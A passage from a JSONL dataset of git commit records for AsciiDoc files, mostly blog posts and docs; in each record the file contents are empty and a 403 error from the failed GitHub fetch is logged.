2016-05-04-Hello-my-hubpress.adoc","repos":"lyqiangmny\/lyqiangmny.github.io,lyqiangmny\/lyqiangmny.github.io,lyqiangmny\/lyqiangmny.github.io,lyqiangmny\/lyqiangmny.github.io","old_file":"_posts\/2016-05-04-Hello-my-hubpress.adoc","new_file":"_posts\/2016-05-04-Hello-my-hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lyqiangmny\/lyqiangmny.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6db27e06dc28099191b3636f26630193dd982379","subject":"Deleted _posts\/2016-07-03-Rights-and-Duties.adoc","message":"Deleted _posts\/2016-07-03-Rights-and-Duties.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-03-Rights-and-Duties.adoc","new_file":"_posts\/2016-07-03-Rights-and-Duties.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b2dadde17b962a6bebee600963fdc622fe8bbc4","subject":"added uber-any images readme","message":"added uber-any images readme\n","repos":"Simplicity-at-Source\/oldplatform,Simplicity-at-Source\/oldplatform,Simplicity-at-Source\/oldplatform","old_file":"meta-images\/uber-any\/README.adoc","new_file":"meta-images\/uber-any\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Simplicity-at-Source\/oldplatform.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e4ab85f966182c8f8c43c3e475b1a46e51dc644d","subject":"`usage.txt` has unnecessary anchor symbol","message":"`usage.txt` has unnecessary anchor symbol\n\nRemove it.\n","repos":"dulanov\/emerald-rs","old_file":"docs\/cli.adoc","new_file":"docs\/cli.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6c76ff155fd824595def51a48df68686eb00abad","subject":"post(jq): new jq post","message":"post(jq): new jq post\n","repos":"code-troopers\/website,code-troopers\/website,code-troopers\/website","old_file":"site\/content\/blog\/2018-04-26_jq.adoc","new_file":"site\/content\/blog\/2018-04-26_jq.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/code-troopers\/website.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9f009ecf2eb788ea7e1627a01cdd3cf4c802cc3","subject":"Update 2017-08-09-In-Praise-of-Galvanize.adoc","message":"Update 2017-08-09-In-Praise-of-Galvanize.adoc","repos":"ashelle\/ashelle.github.io,ashelle\/ashelle.github.io,ashelle\/ashelle.github.io,ashelle\/ashelle.github.io","old_file":"_posts\/2017-08-09-In-Praise-of-Galvanize.adoc","new_file":"_posts\/2017-08-09-In-Praise-of-Galvanize.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ashelle\/ashelle.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf3cbeead24468b81432a7610d1cf39dad268f24","subject":"Update 2016-10-08.adoc","message":"Update 2016-10-08.adoc","repos":"jjmean2\/server-study,jjmean2\/server-study,jjmean2\/server-study,jjmean2\/server-study","old_file":"_posts\/2016-10-08.adoc","new_file":"_posts\/2016-10-08.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jjmean2\/server-study.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9ff3d441679a1ddacc0751430872501c35790b1","subject":"Update 2017-02-23.adoc","message":"Update 2017-02-23.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2017-02-23.adoc","new_file":"_posts\/2017-02-23.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa7e26a552ebbe12b587d3663b58c541f1feb64f","subject":"Update 2017-01-17-New-blog-Portfolio.adoc","message":"Update 2017-01-17-New-blog-Portfolio.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2017-01-17-New-blog-Portfolio.adoc","new_file":"_posts\/2017-01-17-New-blog-Portfolio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"388a909a0bca827a7d2c49f479386a56401698e3","subject":"Update 2017-11-23-Azure-8.adoc","message":"Update 2017-11-23-Azure-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-23-Azure-8.adoc","new_file":"_posts\/2017-11-23-Azure-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07743114aca7a6ac38d240077e7cc3db216fc118","subject":"Update 2015-09-16-Material.adoc","message":"Update 2015-09-16-Material.adoc","repos":"harichen\/harichen.io,harichen\/harichen.io,harichen\/harichen.io","old_file":"_posts\/2015-09-16-Material.adoc","new_file":"_posts\/2015-09-16-Material.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harichen\/harichen.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f90731319ebedce69f3df20ded79e84074af9622","subject":"Update 2015-05-14-Yeah.adoc","message":"Update 2015-05-14-Yeah.adoc","repos":"flug\/flug.github.io,flug\/flug.github.io,flug\/flug.github.io,flug\/flug.github.io","old_file":"_posts\/2015-05-14-Yeah.adoc","new_file":"_posts\/2015-05-14-Yeah.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/flug\/flug.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"51de9e986eabaf6906e85fcbaec9b0b6093022f4","subject":"Update 2015-04-14-A-Beginning.adoc","message":"Update 2015-04-14-A-Beginning.adoc","repos":"rh0\/the-myriad-path,rh0\/the-myriad-path,rh0\/the-myriad-path","old_file":"_posts\/2015-04-14-A-Beginning.adoc","new_file":"_posts\/2015-04-14-A-Beginning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rh0\/the-myriad-path.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b0ecaf0c92f2eab2ee8697758c5a94dc5bb37d5","subject":"Update 2017-09-18-First-Blog.adoc","message":"Update 2017-09-18-First-Blog.adoc","repos":"brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io","old_file":"_posts\/2017-09-18-First-Blog.adoc","new_file":"_posts\/2017-09-18-First-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brendena\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6dd5bf490ead60a0c34ebfb1e3e6f9e2787f1524","subject":"Update 2017-03-10-K-O-O-V-E-R.adoc","message":"Update 2017-03-10-K-O-O-V-E-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-10-K-O-O-V-E-R.adoc","new_file":"_posts\/2017-03-10-K-O-O-V-E-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a888b902f6c95e6636a465be42d21af29d209326","subject":"docs added","message":"docs added\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0429095b699c3fd62af0bb9efff89b4b7ff8c4ff","subject":"update doc","message":"update doc\n","repos":"alannesta\/fis3,xtidt\/fis3,Brother-Simon\/fis3,BobJavascript\/fis3,fengshao0907\/fis3,Suninus\/fis3,nieying\/fis3,philip8728\/fis3,liaolunhui\/fis3,FrancesShih\/fis3,sweet3c\/fis3,7213\/fis3,FrancesShih\/fis3,magicstf\/fis3,blue2sky\/fis3,jincdream\/fis3,philip8728\/fis3,wenyang12\/fis3,fengshao0907\/fis3,sxlfzhy\/fis3,atian25\/fis3,liukaijv\/fis3,samlin08\/fis3,loopnz\/fis3,BobJavascript\/fis3,alannesta\/fis3,jy03078959\/fis3,lpshan\/fis3,liukaijv\/fis3,alannesta\/fis3,enng0227\/fis3,ybg555\/fis3,taohaoge\/fis3,blue2sky\/fis3,atian25\/fis3,jy03078959\/fis3,lpshan\/fis3,fex-team\/fis3,7213\/fis3,richard-chen-1985\/fis3,blue2sky\/fis3,shijunwei\/fis3,sweet3c\/fis3,gaoxiaopang\/fis3,aifeld\/fis3,7213\/fis3,jy03078959\/fis3,samlin08\/fis3,loopnz\/fis3,ybg555\/fis3,nieying\/fis3,krock01\/fis3,sweet3c\/fis3,FrancesShih\/fis3,jincdream\/fis3,mircle\/fis3,nieying\/fis3,gaoxiaopang\/fis3,taohaoge\/fis3,Suninus\/fis3,taohaoge\/fis3,aifeld\/fis3,blue2sky\/fis3,philip8728\/fis3,evilemon\/fis3,krock01\/fis3,enng0227\/fis3,sxlfzhy\/fis3,krock01\/fis3,nieying\/fis3,krock01\/fis3,taohaoge\/fis3,liukaijv\/fis3,fex-team\/fis3,sxlfzhy\/fis3,Brother-Simon\/fis3,blue2sky\/fis3,Brother-Simon\/fis3,Suninus\/fis3,xtidt\/fis3,evilemon\/fis3,jy03078959\/fis3,richard-chen-1985\/fis3,FrancesShih\/fis3,Brother-Simon\/fis3,fengshao0907\/fis3,sweet3c\/fis3,fex-team\/fis3,philip8728\/fis3,liukaijv\/fis3,samlin08\/fis3,krock01\/fis3,wenyang12\/fis3,sxlfzhy\/fis3,fex-team\/fis3,liukaijv\/fis3,charleschaochen\/fis3,jincdream\/fis3,loopnz\/fis3,enng0227\/fis3,taohaoge\/fis3,evilemon\/fis3,shijunwei\/fis3,enng0227\/fis3,BobJavascript\/fis3,mircle\/fis3,charleschaochen\/fis3,charleschaochen\/fis3,liaolunhui\/fis3,hechunwen\/fis3,xtidt\/fis3,7213\/fis3,yonglehou\/fis3,BobJavascript\/fis3,Brother-Simon\/fis3,samlin08\/fis3,richard-chen-1985\/fis3,magicstf\/fis3,magicstf\/fis3,yonglehou\/fis3,fengshao0907\/fis3,enng0227\/fis3,jincdream\/fis3,alannesta\/fis3,fex-team\/fis3,shijunwei\/fis3,wenyang12\/fis3,ybg555\/fis3,shijunwei\/fis3,atian25\/fis3,evilemon\/fis3,fengshao0907\/fis3,liaolunhui\/fis3,mircle\/fis3,xtidt\/fis3,hechunwen\/fis3,lpshan\/fis3,philip8728\/fis3,aifeld\/fis3,alannesta\/fis3,7213\/fis3,shijunwei\/fis3,nieying\/fis3,ybg555\/fis3,magicstf\/fis3,Suninus\/fis3,charleschaochen\/fis3,mircle\/fis3,liaolunhui\/fis3,sxlfzhy\/fis3,gaoxiaopang\/fis3,gaoxiaopang\/fis3,aifeld\/fis3,atian25\/fis3,charleschaochen\/fis3,lpshan\/fis3,wenyang12\/fis3,atian25\/fis3,yonglehou\/fis3,samlin08\/fis3,gaoxiaopang\/fis3,jy03078959\/fis3,loopnz\/fis3,yonglehou\/fis3,richard-chen-1985\/fis3,wenyang12\/fis3,lpshan\/fis3,aifeld\/fis3,hechunwen\/fis3,hechunwen\/fis3,liaolunhui\/fis3","old_file":"doc\/index.adoc","new_file":"doc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alannesta\/fis3.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"7105e63bf2fc9c7b8d3f43db47b9cd76a8fa65ee","subject":"initial cut of reworked GEP-7","message":"initial cut of reworked GEP-7\n","repos":"groovy\/groovy-website,groovy\/groovy-website","old_file":"site\/src\/site\/wiki\/GEP-7.adoc","new_file":"site\/src\/site\/wiki\/GEP-7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/groovy\/groovy-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f9f10d26fbfcf1af274987e65b12e549ec31bed8","subject":"Update 2017-04-06-La-curiosita.adoc","message":"Update 2017-04-06-La-curiosita.adoc","repos":"justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io","old_file":"_posts\/2017-04-06-La-curiosita.adoc","new_file":"_posts\/2017-04-06-La-curiosita.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/justafool5\/justafool5.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"56b3c1b6c7bf9a64c5e3436fa5bf08fa714d4550","subject":"changes","message":"changes\n","repos":"frans-fuerst\/thinks,frans-fuerst\/thinks,frans-fuerst\/thinks","old_file":"content\/available\/2015-04-01-13-mind.asciidoc","new_file":"content\/available\/2015-04-01-13-mind.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/frans-fuerst\/thinks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e2cd2862fac9db95b1aef001cee5245fa7a7aece","subject":"minor rewording of abstract","message":"minor rewording of abstract\n","repos":"couchbaselabs\/Workshop,couchbaselabs\/Workshop,couchbaselabs\/Workshop","old_file":"connect2016\/developer\/README.adoc","new_file":"connect2016\/developer\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/couchbaselabs\/Workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9746a650ef2bfa494e329047445bb5d18f23863c","subject":"Update 2016-08-09-Santorini-map-guide.adoc","message":"Update 2016-08-09-Santorini-map-guide.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81f8d292f91644a5454918fd49993537cfe115f1","subject":"Mention Andrey Hitrin as a contributor.","message":"Mention Andrey Hitrin as a contributor.\n","repos":"onBass-naga\/geb,ntotomanov-taulia\/geb,onBass-naga\/geb,geb\/geb,ntotomanov-taulia\/geb,geb\/geb","old_file":"doc\/manual\/src\/docs\/asciidoc\/140-project.adoc","new_file":"doc\/manual\/src\/docs\/asciidoc\/140-project.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/onBass-naga\/geb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d2462bd305b7bb3bff6805604b9c686d4be65072","subject":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","message":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"86b5068281f886d357b06d61a5aa6685b2f2e103","subject":"removed axioms (accidentally remained in the draft)","message":"removed axioms (accidentally remained in the draft)\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/concepts\/concepts.asciidoc","new_file":"asciidoc\/concepts\/concepts.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e8fc46eb6958fd14f7964723a90778dcdd1e3e7a","subject":"Update 2015-12-21-Flask-Template.adoc","message":"Update 2015-12-21-Flask-Template.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-12-21-Flask-Template.adoc","new_file":"_posts\/2015-12-21-Flask-Template.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"70ba2c666674580d3f1d82b253b4305f2e010f27","subject":"Update 2017-03-10-Im-K-O-O-V-E-R.adoc","message":"Update 2017-03-10-Im-K-O-O-V-E-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-10-Im-K-O-O-V-E-R.adoc","new_file":"_posts\/2017-03-10-Im-K-O-O-V-E-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"05bb3f3227e1d2d00a8e68bbb32420a90efbfc17","subject":"Update 2018-12-14-Metabase-K-P-I.adoc","message":"Update 2018-12-14-Metabase-K-P-I.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-12-14-Metabase-K-P-I.adoc","new_file":"_posts\/2018-12-14-Metabase-K-P-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba4eed87da226cab0586d01e470fc57fd00a8fd8","subject":"CL note: extracting dirname","message":"CL note: extracting dirname\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"aae81efb861e59018c353762581b037c653319d8","subject":"Create sample-file-from-github.adoc","message":"Create sample-file-from-github.adoc","repos":"adoc-editor\/documentation","old_file":"demos\/sample-file-from-github.adoc","new_file":"demos\/sample-file-from-github.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adoc-editor\/documentation.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0366bb7c5ded51278f419940c48a8a6861baade9","subject":"Oops, syntax error","message":"Oops, syntax error\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"488faec09efed654077031c009647be329a5832c","subject":"Update 2016-10-12-grunt-es2015.adoc","message":"Update 2016-10-12-grunt-es2015.adoc","repos":"tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr","old_file":"_posts\/2016-10-12-grunt-es2015.adoc","new_file":"_posts\/2016-10-12-grunt-es2015.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tmdgus0118\/blog.code404.co.kr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fec1ff402f65cd2a0b7b07f3bae6845886139cc7","subject":"Update 2016-11-18-Sass-Awesome.adoc","message":"Update 2016-11-18-Sass-Awesome.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-18-Sass-Awesome.adoc","new_file":"_posts\/2016-11-18-Sass-Awesome.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c833742dabd76f6df0187bd4a20011ef1db05b6b","subject":"Update 2018-01-29-Whats-up-Flutter-February-2018.adoc","message":"Update 2018-01-29-Whats-up-Flutter-February-2018.adoc","repos":"triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io","old_file":"_posts\/2018-01-29-Whats-up-Flutter-February-2018.adoc","new_file":"_posts\/2018-01-29-Whats-up-Flutter-February-2018.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/triskell\/triskell.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5cb425cddc0d1ebc8ebad0632cd0bcca3cd0b7a6","subject":"topic: added time-and-date","message":"topic: added time-and-date\n","repos":"vdmeer\/skb","old_file":"documents\/library\/topic-time-and-date.adoc","new_file":"documents\/library\/topic-time-and-date.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vdmeer\/skb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"df98ad44a7a98a7388daf31f9d6a57e79bbbf53f","subject":"Update 2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","message":"Update 2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","new_file":"_posts\/2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"56c0de3825c3c77e0d07ca3fdd5bef1f4c92f40e","subject":"Update 2017-02-11-bring-us-to-your-leader.adoc","message":"Update 2017-02-11-bring-us-to-your-leader.adoc","repos":"thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io","old_file":"_posts\/2017-02-11-bring-us-to-your-leader.adoc","new_file":"_posts\/2017-02-11-bring-us-to-your-leader.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thomaszahr\/thomaszahr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6667899649f76d74b52f07da6b00a4a738f8bc13","subject":"Description of the roles.","message":"Description of the roles.\n","repos":"uclouvain\/osis,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain","old_file":"doc\/development\/software-process.adoc","new_file":"doc\/development\/software-process.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"a8c8b81d48b7e430ec621c0c371bae76529940b5","subject":"Update 2017-08-01-Test-Page.adoc","message":"Update 2017-08-01-Test-Page.adoc","repos":"cringler\/cringler.github.io,cringler\/cringler.github.io,cringler\/cringler.github.io,cringler\/cringler.github.io","old_file":"_posts\/2017-08-01-Test-Page.adoc","new_file":"_posts\/2017-08-01-Test-Page.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cringler\/cringler.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5199ccf3d98a79c19fb1f95050e203f09a70c80","subject":"Add packagement outline","message":"Add packagement outline\n","repos":"ttroy50\/cmake-examples,ttroy50\/cmake-examples,ttroy50\/cmake-examples","old_file":"07-package-management\/README.adoc","new_file":"07-package-management\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ttroy50\/cmake-examples.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f84ae92e519b5c140952fb569f46fb7c1a19b423","subject":"[DOCS] Add X-Pack node settings for Elasticsearch Reference (elastic\/x-pack-elasticsearch#1688)","message":"[DOCS] Add X-Pack node settings for Elasticsearch Reference (elastic\/x-pack-elasticsearch#1688)\n\n* [DOCS] Add X-Pack node settings for Elasticsearch Reference\r\n\r\n* [DOCS] Fix callout in node.asciidoc\r\n\nOriginal commit: elastic\/x-pack-elasticsearch@9c2944173497599b00751a1b94795be9628aa275\n","repos":"scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,vroyer\/elassandra,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,strapdata\/elassandra,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,vroyer\/elassandra,vroyer\/elassandra,uschindler\/elasticsearch,robin13\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,HonzaKral\/elasticsearch,strapdata\/elassandra,coding0011\/elasticsearch","old_file":"docs\/en\/node.asciidoc","new_file":"docs\/en\/node.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"afba35f3b52532f7a6b6b39ca50ea7925c670a0c","subject":"Update 2018-12-22-A-A-R-C-H-I-E-Guide-to-app-architecture.adoc","message":"Update 2018-12-22-A-A-R-C-H-I-E-Guide-to-app-architecture.adoc","repos":"IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io","old_file":"_posts\/2018-12-22-A-A-R-C-H-I-E-Guide-to-app-architecture.adoc","new_file":"_posts\/2018-12-22-A-A-R-C-H-I-E-Guide-to-app-architecture.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/IdoramNaed\/idoramnaed.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fcdc90579b7162b3341ea13185c30716ec99c408","subject":"added readme","message":"added 